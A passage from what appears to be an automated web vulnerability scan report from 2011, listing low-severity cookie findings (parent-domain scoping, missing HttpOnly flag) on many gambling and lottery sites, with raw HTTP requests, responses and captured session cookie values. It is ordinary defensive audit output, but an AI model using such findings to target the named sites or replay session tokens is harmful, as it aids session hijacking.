Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

11.238. http://www.thawte.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.thawte.com
Path:	/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

v1st=6CA51F7C72FB1FFE; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.thawte.com
v1st=6CA51F7C72FB1FFE; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.thawte.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.thawte.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:24:06 GMT
Server: Apache
Set-Cookie: v1st=6CA51F7C72FB1FFE; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.thawte.com
Set-Cookie: v1st=6CA51F7C72FB1FFE; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.thawte.com
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 39346

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Co
...[SNIP]...

11.239. https://www.thawte.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.thawte.com
Path:	/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

v1st=5154A4B37CB7DE69; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.thawte.com
v1st=5154A4B37CB7DE69; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.thawte.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.thawte.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.240. http://www.verisign.co.uk/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verisign.co.uk
Path:	/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

v1st=3D2EA54A28A1F00A; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.verisign.co.uk
v1st=3D2EA54A28A1F00A; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.verisign.co.uk

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.verisign.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.241. http://www.youtube.com/user/CrazyScratchCom previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.youtube.com
Path:	/user/CrazyScratchCom

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
VISITOR_INFO1_LIVE=QJdmZX3XHX0; path=/; domain=.youtube.com; expires=Wed, 11-Jan-2012 11:58:44 GMT
GEO=dfb55d2f94c5feeb036cbf6d295ddc27cwsAAAAzVVOtwdbzTdERdA==; path=/; domain=.youtube.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /user/CrazyScratchCom HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.242. http://www.youtube.com/user/PostcodeLottery previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.youtube.com
Path:	/user/PostcodeLottery

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
VISITOR_INFO1_LIVE=QPD6waz_a-Y; path=/; domain=.youtube.com; expires=Wed, 11-Jan-2012 11:58:44 GMT
GEO=dfb55d2f94c5feeb036cbf6d295ddc27cwsAAAAzVVOtwdbzTdERdA==; path=/; domain=.youtube.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /user/PostcodeLottery HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.243. http://www.youtube.com/user/primescratchcards1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.youtube.com
Path:	/user/primescratchcards1

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
VISITOR_INFO1_LIVE=o7D5C2X2FIw; path=/; domain=.youtube.com; expires=Wed, 11-Jan-2012 11:58:46 GMT
GEO=8d3458027bf69c9d59b40211c24404e3cwsAAAAzVVOtwdbzTdERdg==; path=/; domain=.youtube.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /user/primescratchcards1 HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.244. http://www.youtube.com/v/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.youtube.com
Path:	/v/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

VISITOR_INFO1_LIVE=VtM0_rUoIeg; path=/; domain=.youtube.com; expires=Wed, 11-Jan-2012 11:58:46 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /v/ HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 16 May 2011 11:58:46 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: VISITOR_INFO1_LIVE=VtM0_rUoIeg; path=/; domain=.youtube.com; expires=Wed, 11-Jan-2012 11:58:46 GMT
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Length: 0
Content-Type: text/html; charset=utf-8
Connection: close

12. Cookie without HttpOnly flag set previous next
There are 380 instances of this issue:

http://bingo.bet365.com/play/en/home/
http://blog.primescratchcards.co.uk/
http://br.winnings.com/
http://casino.bet365.com/en/
http://casino.bet365.com/extra/en/online-games/baccarat
http://casino.bet365.com/extra/en/online-games/blackjack
http://casino.bet365.com/extra/en/online-games/live-dealer
http://casino.bet365.com/extra/en/online-games/roulette
http://casino.bet365.com/home/en/
http://da.crazyscratch.com/
http://da.winnings.com/
http://de.crazyscratch.com/
http://de.winnings.com/
http://el.crazyscratch.com/
http://el.winnings.com/
http://en.crazyscratch.com/
http://es.crazyscratch.com/
http://es.winnings.com/
http://fi.crazyscratch.com/
http://fi.winnings.com/
http://fr.crazyscratch.com/
http://fr.winnings.com/
http://games.bet365.com/en/scratchcards/
http://games.bet365.com/home/en/
http://getclicky.com/66384109
https://help.betsson.com/display/4/kb/faq/index.aspx
http://hu.crazyscratch.com/
http://it.crazyscratch.com/
http://mad4milk.net/
https://members.bet365.com/members/chat/
http://nl.crazyscratch.com/
http://nl.winnings.com/
http://no.crazyscratch.com/
http://no.winnings.com/
http://poker.bet365.com/en/
http://poker.bet365.com/home/en/
http://primescratchcards.com/images/bg.jpg
http://pt.crazyscratch.com/
http://pt.winnings.com/
http://scratch.co.uk/
http://scratch.co.uk/promotions/argos/
http://solutions.liveperson.com/ref/lppb.asp
http://sv.crazyscratch.com/
http://sv.winnings.com/
http://trk.primescratchcards.com/
http://winnings.com/xmlrpc.php
http://www.bet365.com/
http://www.bet365.com/bg/
http://www.bet365.com/cs/
http://www.bet365.com/da/
http://www.bet365.com/de/
http://www.bet365.com/el/
http://www.bet365.com/en/
http://www.bet365.com/en/default.asp
http://www.bet365.com/es/
http://www.bet365.com/home/iface.asp
http://www.bet365.com/hu/
http://www.bet365.com/it/
http://www.bet365.com/nn/
http://www.bet365.com/pl/
http://www.bet365.com/pt/
http://www.bet365.com/ro/
http://www.bet365.com/sk/
http://www.bet365.com/sv/
http://www.bet365.com/zh-CHS/
http://www.bet365.com/zh-CHT/
https://www.betsson.com/en/about/
https://www.betsson.com/en/about/company-information/payments-and-security/index.asp
https://www.betsson.com/en/customer-service/
https://www.betsson.com/en/customer-service/forgotten-password/
https://www.betsson.com/en/customer-service/privacy-statement/
https://www.betsson.com/en/customer-service/responsible-gaming/
https://www.betsson.com/en/customer-service/terms/index.asp
https://www.betsson.com/en/my-account/refer-a-friend/index.asp
https://www.betsson.com/my-account/refer-a-friend/index.asp
http://www.crazyscratch.com/
http://www.egba.eu/
http://www.lga.org.mt/lga/content.aspx
http://www.lga.org.mt/lga/home.aspx
http://www.metacafe.com/fplayer/
http://www.national-lottery.co.uk/player/p/help/scratchcard.ftl
http://www.opensource.org/licenses/mit-license.php
http://www.paysafecard.com/
http://www.primegaming.com/
http://www.primegrattage.com/
http://www.primescratchcards.com/
http://www.primescratchcards.com/index.asp
http://www.primescratchcards.com.br/
http://www.vincite.net/
http://www.winnings.com/
http://www.winnings.com/xmlrpc.php
http://ad.yieldmanager.com/imp
http://ad.yieldmanager.com/pixel
http://affiliates.interwetten.com/
http://api.twitter.com/1/Metacafe/lists/metacafe/statuses.json
http://b.scorecardresearch.com/b
http://bid.openx.net/json
http://br.bigmoneyscratch.com/Home.aspx
http://br.karamba.com/Home.aspx
http://d.tradex.openx.com/afr.php
http://d.tradex.openx.com/lg.php
http://da.bigmoneyscratch.com/Home.aspx
http://da.karamba.com/Home.aspx
http://da.scratch2cash.com/Home.aspx
http://da.scratchcardheaven.com/Home.aspx
http://de.bigmoneyscratch.com/Home.aspx
http://de.karamba.com/Home.aspx
http://de.scratch2cash.com/Home.aspx
http://de.scratchcardheaven.com/Home.aspx
http://el.karamba.com/Home.aspx
http://es.bigmoneyscratch.com/Home.aspx
http://es.karamba.com/Home.aspx
http://es.scratch2cash.com/Home.aspx
http://es.scratchcardheaven.com/Home.aspx
http://fi.bigmoneyscratch.com/Home.aspx
http://fi.karamba.com/Home.aspx
http://fi.scratchcardheaven.com/Home.aspx
http://fr.bigmoneyscratch.com/Home.aspx
http://fr.karamba.com/Home.aspx
http://fr.scratch2cash.com/Home.aspx
http://fr.scratchcardheaven.com/Home.aspx
http://home.okscratchcards.com/AboutUs.aspx
http://home.okscratchcards.com/ContactUsMail.aspx
http://home.okscratchcards.com/FairPlay.aspx
http://home.okscratchcards.com/PlayersClub.aspx
http://home.okscratchcards.com/Promotions.aspx
http://home.okscratchcards.com/Responsible.aspx
http://home.okscratchcards.com/SecurityAndPrivacy.aspx
http://home.okscratchcards.com/Terms.aspx
http://home.okscratchcards.com/help.aspx
http://home.okscratchcards.com/visit.aspx
http://it.bigmoneyscratch.com/Home.aspx
http://it.karamba.com/Home.aspx
http://it.scratch2cash.com/Home.aspx
http://it.scratchcardheaven.com/Home.aspx
http://m.xp1.ru4.com/ad
http://nettiarpa.com/
http://nl.bigmoneyscratch.com/Home.aspx
http://nl.karamba.com/Home.aspx
http://nl.scratch2cash.com/Home.aspx
http://nl.scratchcardheaven.com/Home.aspx
http://no.bigmoneyscratch.com/Home.aspx
http://no.karamba.com/Home.aspx
http://no.scratchcardheaven.com/Home.aspx
http://pixel.invitemedia.com/data_sync
http://pixel.quantserve.com/pixel
http://pixel.quantserve.com/pixel/p-96ifrWFBpTdiA.gif
http://primescratchcards.com/images/HelpDepositMethods.asp
http://primescratchcards.com/images/InviteFriend.asp
http://primescratchcards.com/images/Responsible.asp
http://primescratchcards.com/images/SecurityAndPrivacy.asp
http://primescratchcards.com/images/aboutus.asp
http://primescratchcards.com/images/affiliates.asp
http://primescratchcards.com/images/contactus.asp
http://primescratchcards.com/images/fairplay.asp
http://primescratchcards.com/images/help.asp
http://primescratchcards.com/images/index.asp
http://primescratchcards.com/images/media.asp
http://primescratchcards.com/images/playersclub.asp
http://primescratchcards.com/images/promotions.asp
http://primescratchcards.com/images/terms.asp
http://primescratchcards.com/images/underage.asp
http://pt.bigmoneyscratch.com/Home.aspx
http://pt.karamba.com/Home.aspx
http://pt.scratch2cash.com/Home.aspx
http://pt.scratchcardheaven.com/Home.aspx
http://scratch.co.uk/
http://scratch.co.uk/about/
http://scratch.co.uk/contact/
http://scratch.co.uk/help/
http://scratch.co.uk/help/deposit/methods/
http://scratch.co.uk/help/fairplay/
http://scratch.co.uk/help/privacy/
http://scratch.co.uk/invite-friend/
http://scratch.co.uk/over-18/
http://scratch.co.uk/problem-gambling/
http://scratch.co.uk/promotions/
http://scratch.co.uk/terms/
http://scratch.co.uk/vis-club/
http://scratch.co.uk/winners/
http://server.iad.liveperson.net/hc/15712222/
http://server.iad.liveperson.net/hc/15712222/
http://server.iad.liveperson.net/hc/15712222/
http://sv.bigmoneyscratch.com/Home.aspx
http://sv.karamba.com/Home.aspx
http://sv.scratch2cash.com/Home.aspx
http://sv.scratchcardheaven.com/Home.aspx
http://twitter.com/PostcodeLottery
http://twitter.com/PrimeScratch
http://twitter.com/crazyscratch
http://twitter.com/ukscratch
http://va.px.invitemedia.com/goog_imp
http://winter.metacafe.com/Openx/www/delivery/lg.php
http://www.bet365.com/extra/en/betting/in-play
http://www.bet365.com/extra/en/betting/live-streaming
http://www.bet365.com/extra/en/mobile/introduction/
http://www.bet365.com/extra/en/promotions/horse-racing/best-odds-guaranteed
http://www.bet365.com/extra/en/promotions/soccer/bore-draw-money-back
http://www.bet365.com/extra/en/promotions/soccer/soccer-accumulator-bonus
https://www.betsson.com/core/StartPlaying/Api/StartPlayingInit.ashx
https://www.betsson.com/core/StartPlaying/Scripts/Compiled/StartPlayingApi.js
https://www.betsson.com/start/en/
https://www.betsson.com/start/is/
https://www.betsson.com/web/en/sportsbook/
http://www.bigmoneyscratch.com/
http://www.bigmoneyscratch.com/AboutUs.aspx
http://www.bigmoneyscratch.com/Affiliates.aspx
http://www.bigmoneyscratch.com/ContactUsChat.aspx
http://www.bigmoneyscratch.com/ContactUsFax.aspx
http://www.bigmoneyscratch.com/ContactUsMail.aspx
http://www.bigmoneyscratch.com/ContactUsTel.aspx
http://www.bigmoneyscratch.com/FAQ.aspx
http://www.bigmoneyscratch.com/FairPlay.aspx
http://www.bigmoneyscratch.com/Help.aspx
http://www.bigmoneyscratch.com/Home.aspx
http://www.bigmoneyscratch.com/InviteFriend.aspx
http://www.bigmoneyscratch.com/Mobile.aspx
http://www.bigmoneyscratch.com/PlayersClub.aspx
http://www.bigmoneyscratch.com/Promotions.aspx
http://www.bigmoneyscratch.com/Responsible.aspx
http://www.bigmoneyscratch.com/SecurityAndPrivacy.aspx
http://www.bigmoneyscratch.com/Terms.aspx
http://www.bigmoneyscratch.com/UnderAge.aspx
http://www.facebook.com/
http://www.facebook.com/PrimeScratchCards
http://www.facebook.com/WinningsCom
http://www.facebook.com/crazyscratch
http://www.facebook.com/pages/BigMoneyScratch/156518521055171
http://www.facebook.com/pages/PrimeScratchCards/122783514413813
http://www.facebook.com/peoplespostcodelottery
http://www.gambleaware.co.uk/
http://www.gamblersanonymous.org.uk/
http://www.hopa.com/
http://www.hopa.com/visit.aspx
http://www.info.crazyscratch.com/AboutUs.aspx
http://www.info.crazyscratch.com/ContactUsFax.aspx
http://www.info.crazyscratch.com/ContactUsMail.aspx
http://www.info.crazyscratch.com/ContactUsTel.aspx
http://www.info.crazyscratch.com/FairPlay.aspx
http://www.info.crazyscratch.com/Help.aspx
http://www.info.crazyscratch.com/InviteFriend.aspx
http://www.info.crazyscratch.com/PlayersClub.aspx
http://www.info.crazyscratch.com/Privacy.aspx
http://www.info.crazyscratch.com/Promotions.aspx
http://www.info.crazyscratch.com/Responsible.aspx
http://www.info.crazyscratch.com/Terms.aspx
http://www.info.crazyscratch.com/UnderAge.aspx
http://www.info.crazyscratch.com/visit.aspx
http://www.info.winnings.com/visit.aspx
https://www.interwetten.com/
http://www.karamba.com/
http://www.karamba.com/AboutUs.aspx
http://www.karamba.com/FairPlay.aspx
http://www.karamba.com/Help.aspx
http://www.karamba.com/Home.aspx
http://www.karamba.com/InviteFriend.aspx
http://www.karamba.com/PlayersClub.aspx
http://www.karamba.com/Privacy.aspx
http://www.karamba.com/Promotions.aspx
http://www.karamba.com/Responsible.aspx
http://www.karamba.com/Sitemap.aspx
http://www.karamba.com/Terms.aspx
http://www.karamba.com/UnderAge.aspx
http://www.karamba.com/click/Karamba.com/ENG/Home/
http://www.mundirasca.com/
http://www.mundirasca.com/AboutUs.aspx
http://www.mundirasca.com/ContactUsChat.aspx
http://www.mundirasca.com/ContactUsFax.aspx
http://www.mundirasca.com/ContactUsMail.aspx
http://www.mundirasca.com/ContactUsTel.aspx
http://www.mundirasca.com/FAQ.aspx
http://www.mundirasca.com/FairPlay.aspx
http://www.mundirasca.com/Help.aspx
http://www.mundirasca.com/Home.aspx
http://www.mundirasca.com/InviteFriend.aspx
http://www.mundirasca.com/PlayersClub.aspx
http://www.mundirasca.com/Promotions.aspx
http://www.mundirasca.com/Responsible.aspx
http://www.mundirasca.com/SecurityAndPrivacy.aspx
http://www.mundirasca.com/Terms.aspx
http://www.mundirasca.com/UnderAge.aspx
http://www.mundirasca.com/click/MundiRasca.com/SPA/Home/
http://www.neteller.com/
http://www.pclscratch.com/ContactUsMail.aspx
http://www.pclscratch.com/FairPlay.aspx
http://www.pclscratch.com/Promotions.aspx
http://www.pclscratch.com/Responsible.aspx
http://www.pclscratch.com/SecurityAndPrivacy.aspx
http://www.pclscratch.com/Terms.aspx
http://www.postcodelottery.com/AboutUs.htm
http://www.postcodelottery.com/AboutUs/PrivacyPolicy.htm
http://www.postcodelottery.com/AboutUs/TermsAndConditions.htm
http://www.postcodelottery.com/Charities.htm
http://www.postcodelottery.com/DrawResults.htm
http://www.postcodelottery.com/FunGames.htm
http://www.postcodelottery.com/FunGames/FreeGames.htm
http://www.postcodelottery.com/FunGames/PaidGames.htm
http://www.postcodelottery.com/FunGames/PaidGames/PostcodeLotteryScratch.htm
http://www.postcodelottery.com/FunGames/PostcodeChallenge.htm
http://www.postcodelottery.com/Games/Scratchcards.htm
http://www.postcodelottery.com/Home.htm
http://www.postcodelottery.com/HowItWorks.htm
http://www.postcodelottery.com/MyAccount.htm
http://www.postcodelottery.com/RSS.htm
http://www.postcodelottery.com/Sitemap.htm
https://www.postcodelottery.com/PlayNOW/OrderYourTickets.htm
http://www.primescratchcards.com/HelpDepositMethods.asp
http://www.primescratchcards.com/InviteFriend.asp
http://www.primescratchcards.com/Responsible.asp
http://www.primescratchcards.com/SecurityAndPrivacy.asp
http://www.primescratchcards.com/aboutus.asp
http://www.primescratchcards.com/affiliates.asp
http://www.primescratchcards.com/contactus.asp
http://www.primescratchcards.com/fairplay.asp
http://www.primescratchcards.com/help.asp
http://www.primescratchcards.com/media.asp
http://www.primescratchcards.com/playersclub.asp
http://www.primescratchcards.com/promotions.asp
http://www.primescratchcards.com/terms.asp
http://www.primescratchcards.com/underage.asp
http://www.scratch2cash.com/
http://www.scratch2cash.com/AboutUs.aspx
http://www.scratch2cash.com/ContactUsMail.aspx
http://www.scratch2cash.com/FairPlay.aspx
http://www.scratch2cash.com/Help.aspx
http://www.scratch2cash.com/Home.aspx
http://www.scratch2cash.com/InviteFriend.aspx
http://www.scratch2cash.com/PlayersClub.aspx
http://www.scratch2cash.com/Promotions.aspx
http://www.scratch2cash.com/Responsible.aspx
http://www.scratch2cash.com/SecurityAndPrivacy.aspx
http://www.scratch2cash.com/Sitemap.aspx
http://www.scratch2cash.com/Terms.aspx
http://www.scratch2cash.com/UnderAge.aspx
http://www.scratchcardheaven.com/
http://www.scratchcardheaven.com/AboutUs.aspx
http://www.scratchcardheaven.com/ContactUsMail.aspx
http://www.scratchcardheaven.com/FairPlay.aspx
http://www.scratchcardheaven.com/Help.aspx
http://www.scratchcardheaven.com/Home.aspx
http://www.scratchcardheaven.com/InviteFriend.aspx
http://www.scratchcardheaven.com/PlayersClub.aspx
http://www.scratchcardheaven.com/Promotions.aspx
http://www.scratchcardheaven.com/Responsible.aspx
http://www.scratchcardheaven.com/SecurityAndPrivacy.aspx
http://www.scratchcardheaven.com/Terms.aspx
http://www.scratchcardheaven.com/UnderAge.aspx
http://www.svenskalotter.com/
http://www.svenskalotter.com/AboutUs.aspx
http://www.svenskalotter.com/Affiliates.aspx
http://www.svenskalotter.com/Charity.aspx
http://www.svenskalotter.com/ContactUsMail.aspx
http://www.svenskalotter.com/FairPlay.aspx
http://www.svenskalotter.com/Help.aspx
http://www.svenskalotter.com/Home.aspx
http://www.svenskalotter.com/InviteFriend.aspx
http://www.svenskalotter.com/PlayersClub.aspx
http://www.svenskalotter.com/Promotions.aspx
http://www.svenskalotter.com/Responsible.aspx
http://www.svenskalotter.com/SecurityAndPrivacy.aspx
http://www.svenskalotter.com/Terms.aspx
http://www.svenskalotter.com/UnderAge.aspx
http://www.svenskalotter.com/click/Svenskalotter.com/SWE/Home/
http://www.thawte.com/
https://www.thawte.com/
http://www.verisign.co.uk/
http://www.visa.co.uk/
http://www.winnings.com/comments/feed
http://www.winnings.com/feed
http://www.winnings.com/how-to-win-money
http://www.winnings.com/instant-games
http://www.winnings.com/lottery-scratch-cards
http://www.winnings.com/scratch-cards
http://www.winnings.com/site-map
http://www.winnings.com/slots
http://www.winnings.com/wp-admin/admin-ajax.php
http://www.youtube.com/user/CrazyScratchCom
http://www.youtube.com/user/PostcodeLottery
http://www.youtube.com/user/primescratchcards1
http://www.youtube.com/v/

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

12.1. http://bingo.bet365.com/play/en/home/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://bingo.bet365.com
Path:	/play/en/home/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

session=stk=FE57C4F4DDFF44EDB9007B44EEA8BA12000002; path=/
stk=FE57C4F4DDFF44EDB9007B44EEA8BA12000002; path=/
lng=en-GB; expires=Tue, 15-May-2012 12:35:26 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /play/en/home/ HTTP/1.1
Host: bingo.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.2. http://blog.primescratchcards.co.uk/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://blog.primescratchcards.co.uk
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=dkgc1a7hrji5t2svft9c8fovq2; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: blog.primescratchcards.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:35:54 GMT
Server: Apache
Pragma: no-cache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
X-Pingback: http://blog.primescratchcards.co.uk/xmlrpc.php
Set-Cookie: PHPSESSID=dkgc1a7hrji5t2svft9c8fovq2; path=/
Last-Modified: Mon, 16 May 2011 12:35:54 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 92113

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

12.3. http://br.winnings.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://br.winnings.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

winnings[sessionId]=103123651; path=/; domain=.winnings.com
WinningsSID=b8ce8h87e1pqll04kbcnv4sh36; path=/; domain=.winnings.com
qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=winnings.com
winnings[vid]=541024; expires=Tue, 15-May-2012 12:45:27 GMT; path=/; domain=.winnings.com

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: br.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.4. http://casino.bet365.com/en/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://casino.bet365.com
Path:	/en/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

session=stk=F78693A44C0F441AB8C1C7A10CF8575A000002; path=/
stk=F78693A44C0F441AB8C1C7A10CF8575A000002; path=/
lng=en-GB; expires=Tue, 15-May-2012 12:32:26 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en/ HTTP/1.1
Host: casino.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:32:26 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=kquhbqy0bt0d5yaxszslwnrz; path=/; HttpOnly
Set-Cookie: bet365_Session=; path=/
Set-Cookie: stk=F78693A44C0F441AB8C1C7A10CF8575A000002; path=/
Set-Cookie: session=stk=F78693A44C0F441AB8C1C7A10CF8575A000002; path=/
Set-Cookie: lng=en-GB; expires=Tue, 15-May-2012 12:32:26 GMT; path=/
Set-Cookie: country=198; expires=Tue, 15-May-2012 12:32:26 GMT; path=/
Cache-Control: private
Expires: Sat, 14 May 2011 12:32:26 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 90165

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_Head1"><t
...[SNIP]...

12.5. http://casino.bet365.com/extra/en/online-games/baccarat previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://casino.bet365.com
Path:	/extra/en/online-games/baccarat

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

session=stk=738A9FB42BA343DABCD3136AA3621ACE000002; path=/
stk=738A9FB42BA343DABCD3136AA3621ACE000002; path=/
lng=en-GB; expires=Tue, 15-May-2012 12:32:25 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /extra/en/online-games/baccarat HTTP/1.1
Host: casino.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.6. http://casino.bet365.com/extra/en/online-games/blackjack previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://casino.bet365.com
Path:	/extra/en/online-games/blackjack

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

session=stk=A71662CB8A884A4A9D4A3B4BA20AEE87000002; path=/
stk=A71662CB8A884A4A9D4A3B4BA20AEE87000002; path=/
lng=en-GB; expires=Tue, 15-May-2012 12:32:23 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /extra/en/online-games/blackjack HTTP/1.1
Host: casino.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.7. http://casino.bet365.com/extra/en/online-games/live-dealer previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://casino.bet365.com
Path:	/extra/en/online-games/live-dealer

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

session=stk=AE7AAAF18ED44B4CA0DFD512563D0E3F000002; path=/
stk=AE7AAAF18ED44B4CA0DFD512563D0E3F000002; path=/
lng=en-GB; expires=Tue, 15-May-2012 12:32:25 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

